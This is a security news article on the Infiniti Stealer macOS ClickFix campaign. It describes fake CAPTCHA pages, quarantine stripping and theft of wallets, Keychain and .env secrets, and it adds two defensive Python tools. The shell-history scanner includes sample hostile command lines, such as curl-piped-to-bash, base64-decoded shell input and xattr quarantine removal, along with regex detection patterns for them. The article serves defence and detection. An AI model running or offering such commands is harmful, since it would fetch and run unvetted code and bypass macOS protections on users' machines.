Infiniti Stealer Targets macOS Users via Malicious ClickFix Attacks

Pieter van Meer

Security researchers at GoPlus Security have identified a sophisticated malware campaign dubbed Infiniti Stealer, which specifically targets macOS users within the cryptocurrency and developer communities. The attack utilizes a deceptive "ClickFix" strategy, involving fraudulent Cloudflare CAPTCHA pages that trick victims into manually executing malicious scripts. This campaign represents a growing trend of social engineering tactics designed to bypass traditional browser security measures to exfiltrate encrypted digital assets.

Mechanism of the ClickFix Attack

The infection process begins when a user encounters a fake verification page, often masquerading as a standard Cloudflare security check. The site prompts the user to "fix" a supposed browser error by copying a command and pasting it into the macOS Terminal. Once executed, the initial script performs the following actions:

  • Uses built-in system utilities to strip the macOS quarantine attribute from the downloaded payload, so that unsigned code can run without a Gatekeeper prompt.
  • Writes a second-stage payload to the /tmp directory to minimize its footprint.
  • Initiates a background process that remains invisible to the casual user.

By persuading the user to manually input commands, the attackers successfully bypass Gatekeeper and other built-in macOS security protocols that would typically block unauthorized software.
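Because the user, not the browser, launches the first stage, the most useful detection point is the command itself: shell history, a terminal logging agent, or EDR process-execution events. The scanner below is an added illustration written for this article, not code from GoPlus Security or from the malware; it scores command lines against the traits described above (quarantine-attribute removal, download-and-pipe-to-shell, staging in /tmp, backgrounded and silenced execution). The indicator weights, the threshold and the sample history lines are all constructed for the example.

```python
import re
import sys

# Indicators drawn from the article's description of the ClickFix first stage.
# Weights are a hypothetical scoring choice for this example, not a published rule set.
INDICATORS = [
    # xattr used to remove the quarantine attribute (or clear all attributes)
    ("strip_quarantine_xattr",
     re.compile(r"\bxattr\b.*(-(?:r)?d\s+com\.apple\.quarantine|\s-c\b)"), 4),
    # remote content fetched and piped straight into a shell
    ("download_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"), 4),
    # inline base64 blob decoded and executed
    ("base64_decoded_to_shell",
     re.compile(r"base64\s+(-d|--decode|-D)\b.*\|\s*(ba|z)?sh\b"), 3),
    # payload staged under /tmp
    ("stage_in_tmp", re.compile(r"/tmp/[^\s;|&]+"), 2),
    # process backgrounded and its output discarded
    ("background_silenced",
     re.compile(r"(\bnohup\b|(?<!&)&\s*$|2>\s*/dev/null|>\s*/dev/null)"), 1),
    # downloaded file made executable
    ("chmod_executable", re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b"), 1),
]

# Constructed shell-history lines for demonstration; the URL uses the reserved
# .invalid TLD and the base64 blob is just "ABC".
SAMPLE_HISTORY = [
    "ls -la ~/Projects",
    "git pull origin main",
    "curl -fsSL https://example.invalid/verify.sh | bash",
    "echo 'QUJD' | base64 -d | sh",
    "xattr -d com.apple.quarantine /tmp/.update && chmod +x /tmp/.update "
    "&& nohup /tmp/.update >/dev/null 2>&1 &",
    "brew upgrade",
]


def score_command(cmd: str):
    """Return (score, [indicator names]) for one command line."""
    score, names = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(cmd):
            score += weight
            names.append(name)
    return score, names


def scan_history(lines, threshold: int = 3):
    """Return the lines whose indicator score reaches the threshold."""
    hits = []
    for line in lines:
        score, names = score_command(line)
        if score >= threshold:
            hits.append({"line": line, "score": score, "indicators": names})
    return hits


if __name__ == "__main__":
    # Usage: python clickfix_scan.py [path-to-history-file]; defaults to the sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            lines = [l.rstrip("\n") for l in fh]
    else:
        lines = SAMPLE_HISTORY
    for hit in scan_history(lines):
        print(f"[score {hit['score']}] {hit['line']}")
        print("    indicators:", ", ".join(hit["indicators"]))
```

Run it against `~/.zsh_history` on a suspect Mac to triage quickly, or feed it command-line fields from a process-event stream. A single hit on `stage_in_tmp` alone stays below the threshold on purpose; legitimate tooling writes to /tmp constantly, and it is the combination of traits that characterises the pasted ClickFix command.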

Advanced Payload and Data Exfiltration

The final stage of the Infiniti Stealer is a Python-based Trojan compiled with Nuitka, a tool that converts Python scripts into C++ executables to enhance obfuscation and evade signature-based detection. This malware is specifically programmed to harvest high-value data, including:

  • Encrypted Wallets: Sensitive files related to various cryptocurrency wallet applications.
  • Keychain Data: Credentials stored within the native macOS Keychain system.
  • Browser Data: Saved passwords and cookies from Chromium and Firefox browsers.
  • Developer Assets: Sensitive .env files that often contain API keys and private environment variables.

To stay resident on the host, the malware includes sandbox detection to determine whether it is running under analysis by security researchers, and delays its execution to avoid triggering immediate behavioral alerts.

Security Recommendations for Asset Protection

The emergence of Infiniti Stealer highlights a shift in the threat landscape, with the encrypted assets of Mac users increasingly under fire. GoPlus Security emphasizes that users should never copy and paste unknown commands into their terminal, regardless of how legitimate the source website appears.

Users are advised to remain vigilant against social engineering tactics that request manual terminal input. Maintaining updated security software and utilizing hardware wallets for significant cryptocurrency holdings can provide essential layers of defense against such stealthy exfiltration attempts.

As of March 30, 2026, security experts recommend that individuals who may have interacted with suspicious CAPTCHA prompts should immediately audit their macOS Keychain and rotate keys for any potentially compromised development environments.
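Rotating keys for a possibly compromised development environment starts with knowing which secrets lived in the stolen .env files. The helper below is an added example written for this article (not a GoPlus tool) that walks a projects directory, parses every `.env`-style file, and prints a rotation checklist that names each likely secret while redacting its value, so the checklist itself can be shared with a team without re-exposing credentials. The name and value heuristics, the sample file content and the `proj/.env` path are constructed for the example.

```python
import os
import re

# Names that usually hold credentials (heuristic chosen for this example).
SECRET_NAME_HINT = re.compile(
    r"(KEY|SECRET|TOKEN|PASS(WORD)?|PRIVATE|CREDENTIAL|MNEMONIC|SEED)", re.IGNORECASE)
# Values that embed a password, e.g. scheme://user:password@host
SECRET_VALUE_HINT = re.compile(r"://[^/\s:@]+:[^/\s@]+@")
ENV_LINE = re.compile(r"^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*?)\s*$")

# Constructed sample .env content; none of these are real credentials.
SAMPLE_ENV = """# constructed sample, not real credentials
DATABASE_URL=postgres://app:hunter2@db.internal:5432/app
export AWS_SECRET_ACCESS_KEY='EXAMPLEsecretEXAMPLEsecret12'
STRIPE_API_KEY="sk_test_placeholder_value_0000"
DEBUG=true
API_TIMEOUT=30 # seconds
"""


def parse_env(text: str) -> dict:
    """Parse dotenv-style text into {name: value}, handling export, quotes and comments."""
    values = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = ENV_LINE.match(line)
        if not m:
            continue
        name, value = m.group(1), m.group(2)
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]                      # quoted value, keep verbatim
        elif " #" in value:
            value = value.split(" #", 1)[0].rstrip()  # trailing unquoted comment
        values[name] = value
    return values


def redact(value: str) -> str:
    """Keep only a two-character prefix and suffix so an operator can recognise a key."""
    if len(value) <= 4:
        return "*" * len(value)
    return value[:2] + "*" * (len(value) - 4) + value[-2:]


def looks_secret(name: str, value: str) -> bool:
    return bool(value) and (bool(SECRET_NAME_HINT.search(name))
                            or bool(SECRET_VALUE_HINT.search(value)))


def rotation_checklist(env_files: dict) -> list:
    """env_files maps a path to its text; returns one checklist entry per likely secret."""
    items = []
    for path, text in env_files.items():
        for name, value in parse_env(text).items():
            if looks_secret(name, value):
                items.append({"file": path, "name": name,
                              "hint": redact(value), "length": len(value)})
    return items


def collect_env_files(root: str, max_bytes: int = 65536) -> dict:
    """Read every .env / .env.* file below root (contents capped at max_bytes)."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn == ".env" or fn.startswith(".env."):
                path = os.path.join(dirpath, fn)
                try:
                    with open(path, encoding="utf-8", errors="replace") as fh:
                        found[path] = fh.read(max_bytes)
                except OSError:
                    continue
    return found


if __name__ == "__main__":
    import sys
    # Usage: python env_rotation_checklist.py ~/Projects; defaults to the sample.
    files = collect_env_files(sys.argv[1]) if len(sys.argv) > 1 else {"proj/.env": SAMPLE_ENV}
    for item in rotation_checklist(files):
        print(f"[ ] rotate {item['name']} ({item['file']}): {item['hint']} ({item['length']} chars)")
```

Treat every listed entry as compromised and rotate it at the issuing service, since the stealer copies the file wholesale; the redacted hint only helps match a checklist line to the key in the provider console. Keychain items need a separate review in Keychain Access, which this helper does not cover.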
